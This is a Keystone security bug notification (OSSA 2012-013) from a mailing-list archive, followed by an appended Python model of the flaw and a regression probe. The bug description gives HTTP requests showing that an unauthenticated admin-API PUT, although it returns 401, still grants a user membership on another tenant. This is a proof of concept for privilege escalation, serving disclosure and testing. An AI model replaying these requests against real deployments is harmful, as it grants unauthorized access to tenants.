yahoo-eng-team team mailing list archive

[Bug 1040626] Re: [OSSA 2012-013] Update user's default tenant partially succeeds without authz

 

** Summary changed:

- Update user's default tenant partially succeeds without authz
+ [OSSA 2012-013] Update user's default tenant partially succeeds without authz

** Also affects: ossa
   Importance: Undecided
       Status: New

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Russell Bryant (russellb)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1040626

Title:
  [OSSA 2012-013] Update user's default tenant partially succeeds
  without authz

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released
Status in “keystone” package in Ubuntu:
  Fix Released

Bug description:
  Attempting to update a user's default tenant using the following API
  call returns unauthorized as expected, but the user is still granted
  "membership" on the newly specified tenant.

  As a normal user against the Public API:

  
      GET http://localhost:5000/v2.0/tenants
      ======================================

      X-Auth-Token: cb81c8ba4cb6428ca21b0e8de8b10ab1

  
      200 OK
      ======

      Vary: X-Auth-Token
      Content-Type: application/json

      {
        "tenants": [
          {
            "id": "2636bcb347af46c1a00055e9e0ec3cd7",
            "enabled": true,
            "description": null,
            "name": "A"
          }
        ],
        "tenants_links": []
      }

  Against the Admin API without an X-Auth-Token:

      PUT http://localhost:35357/v2.0/users/679a2bb1e113473db10827895ae9022f/tenant
      =============================================================================

      Content-Type: application/json

      {
        "user": {
          "tenantId": "77e165b067014483a5503fde1fa235d3"
        }
      }

      401 Not Authorized
      ==================

      Vary: X-Auth-Token
      Content-Type: application/json

      {
        "error": {
          "message": "The request you have made requires authentication.",
          "code": 401,
          "title": "Not Authorized"
        }
      }

  And the first call repeated (again, as the user in question against
  the Public API):

  
      GET http://localhost:5000/v2.0/tenants
      ======================================

      X-Auth-Token: cb81c8ba4cb6428ca21b0e8de8b10ab1

  
      200 OK
      ======

      Vary: X-Auth-Token
      Content-Type: application/json

      {
        "tenants": [
          {
            "id": "2636bcb347af46c1a00055e9e0ec3cd7",
            "enabled": true,
            "description": null,
            "name": "A"
          },
          {
            "id": "77e165b067014483a5503fde1fa235d3",
            "enabled": true,
            "description": null,
            "name": "B"
          }
        ],
        "tenants_links": []
      }

  Note that the user's default tenant is not actually updated.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1040626/+subscriptions
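The failure mode in the report (a 401 on the admin-API PUT, yet the user gains membership on the target tenant) is what happens when a handler performs a state change before its authorization check. The block below is an added example, not Keystone's own code and not the actual fix: it is an in-memory model whose update handler can run the membership grant either before or after the admin check, plus the three-step probe the reporter used (list tenants, attempt the unauthenticated PUT, list again). Only the user and tenant ids come from the report; the class, method and constant names, and the admin token, are assumptions made for illustration.

```python
"""Added example (not Keystone's own code): an in-memory model of the
ordering bug described in this report, plus the reporter's three-step probe.
Class/method/constant names are assumptions for illustration; only the user
and tenant ids are taken from the report."""
from dataclasses import dataclass, field

USER = "679a2bb1e113473db10827895ae9022f"
TENANT_A = "2636bcb347af46c1a00055e9e0ec3cd7"
TENANT_B = "77e165b067014483a5503fde1fa235d3"
ADMIN_TOKEN = "admin-token-for-demo"   # constructed value, not a real token


class NotAuthorized(Exception):
    """Stands in for the 401 response shown in the report."""
    code = 401


@dataclass
class FakeKeystone:
    """Minimal identity store exposing the two calls used in the report."""
    default_tenant: dict = field(default_factory=dict)   # user id -> tenant id
    memberships: dict = field(default_factory=dict)      # user id -> {tenant ids}
    authz_before_side_effects: bool = True

    def assert_admin(self, token):
        """Admin-API check: only the service admin token may update users."""
        if token != ADMIN_TOKEN:
            raise NotAuthorized()

    def update_user_tenant(self, token, user_id, tenant_id):
        """Models PUT /v2.0/users/{user_id}/tenant on the admin API."""
        if self.authz_before_side_effects:
            self.assert_admin(token)        # correct ordering: fail closed first
        # Side effect: grant the user membership on the target tenant.
        self.memberships.setdefault(user_id, set()).add(tenant_id)
        if not self.authz_before_side_effects:
            self.assert_admin(token)        # modelled bug: 401 raised after the grant
        self.default_tenant[user_id] = tenant_id   # never reached without authz

    def list_tenants(self, user_id):
        """Models GET /v2.0/tenants on the public API, as the user."""
        return sorted(self.memberships.get(user_id, set()))


def make_keystone(vulnerable):
    """Seed the state from the report: the user is a member of tenant A only."""
    ks = FakeKeystone(authz_before_side_effects=not vulnerable)
    ks.memberships[USER] = {TENANT_A}
    ks.default_tenant[USER] = TENANT_A
    return ks


def probe(ks, user_id, target_tenant, token=None):
    """Reproduce the report: list tenants, attempt the update, list again.

    partial_success is the finding itself: the request was rejected, yet the
    user's tenant list changed."""
    before = set(ks.list_tenants(user_id))
    try:
        ks.update_user_tenant(token, user_id, target_tenant)
        status = 200
    except NotAuthorized as exc:
        status = exc.code
    after = set(ks.list_tenants(user_id))
    gained = sorted(after - before)
    return {
        "status": status,
        "gained": gained,
        "default_tenant": ks.default_tenant.get(user_id),
        "partial_success": status != 200 and bool(gained),
    }


if __name__ == "__main__":
    for vulnerable in (True, False):
        label = "vulnerable" if vulnerable else "fixed"
        print(label, probe(make_keystone(vulnerable), USER, TENANT_B))
```

Against the vulnerable model the probe reports status 401 with tenant B gained and the default tenant still A, matching the report; against the model that authorizes first it reports 401 and no change. The same probe, run with a real token against a live endpoint, is the regression check to keep: compare the user's tenant list before and after any rejected admin-API write, and treat any difference as a bug regardless of the status code returned.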